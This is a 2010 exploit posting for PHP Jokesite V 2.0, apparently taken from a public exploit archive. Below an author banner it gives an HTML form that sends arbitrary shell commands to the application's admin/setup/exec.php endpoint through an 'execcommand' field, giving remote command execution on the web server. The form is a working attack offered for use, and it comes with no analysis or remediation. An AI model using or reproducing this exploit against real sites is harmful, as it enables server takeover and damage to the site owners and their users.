PHP Jokesite V 2.0 exec Command Exploit
Posted on 01 April 2010
======================================= PHP Jokesite V 2.0 exec Command Exploit ======================================= ======================================================================================== | # Title : PHP Jokesite V 2.0 exec command EXploit | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : execcommand ====================== Exploit By indoushka ================================= # Exploit : <form action="http://127.0.0.1/php-jokesite_v2/admin/setup/exec.php" method="post"> <input type="hidden" name="action" value="exec"> <table align="center"> <tr> <td>Enter command to exec:</td> </tr> <tr> <td> <textarea name="execcommand" cols="60" rows="3"> </textarea> </td> </tr> <tr> <td><input type="submit" name="go" value="Go"> </td> </tr> </table> </form> # Inj3ct0r.com [2010-04-01]
